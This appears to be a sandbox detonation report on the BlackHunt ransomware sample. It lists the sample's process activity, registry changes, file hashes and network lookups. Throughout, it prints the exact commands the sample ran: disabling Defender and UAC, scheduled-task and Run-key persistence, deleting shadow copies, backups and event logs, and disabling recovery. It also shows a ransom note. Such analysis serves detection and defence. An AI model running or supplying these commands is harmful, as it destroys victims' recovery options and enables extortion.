PID 2920 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2668 wrote to memory of 1164 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2668 wrote to memory of 1164 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2668 wrote to memory of 1164 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D M:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Setup

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Application

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl System

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security /e:false

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\system32\notepad.exe

notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\system32\taskkill.exe

taskkill /IM mshta.exe /f

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 5

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

C:\ProgramData\#BlackHunt_ReadMe.txt

MD5 587345576e293bae27510d5b5f86f90f
SHA1 0d6ebe9b4759c49d94007f84b8afb313aa35f066
SHA256 02f8fe1de9292b3b7d103a3e3ae8db866e220e2311438591b2052cdcfadb7fee
SHA512 d73b34a89399db8bc809eccd1a3a8f652c48e8ca22b452f2c4b8df700d1863cc05ad17dee3725952063092e89d3799c895efff52eab17bf85ffea7a3401e426d

C:\ProgramData\#BlackHunt_Private.key

MD5 81d51d68908764b737d787768500517a
SHA1 26647e4908fb6805b06b3f41737a993bbb114fbd
SHA256 8f40c6ff5c22a23791f1a28dd864e35e03008a6b5ef1b490c1833101db014590
SHA512 6562d1ef9077ee78e68925a1f77d45ba08219d84d6e204a38c6150c16920cad1db1e9be3a546de9d7afff511608cc67a5a9746bbceb32b9766ce15691cd98563

C:\MSOCache\#BlackHunt_ReadMe.hta

MD5 435ca8a6e9bc47e172512a6e195de294
SHA1 032cde2beb004dd13efcc63b95619d84bbdf8225
SHA256 23aaa8c0746141eea6770c019158a4fd5587234ecd8bd11bf17775a55d878c45
SHA512 634f07cea2d4f96c83dba47412bc4367935670c26892a5d53d3accf5178169dea9a6d20dc759a3d2f69d7545f65907abe8e87fd79656532bc42b91172d2a2fb4

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-06 00:57

Reported

2024-11-06 01:00

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

Signatures

Deletes NTFS Change Journal

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\fsutil.exe N/A
N/A N/A C:\Windows\system32\fsutil.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (3392) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\System32\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" C:\Windows\system32\reg.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\fsutil.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
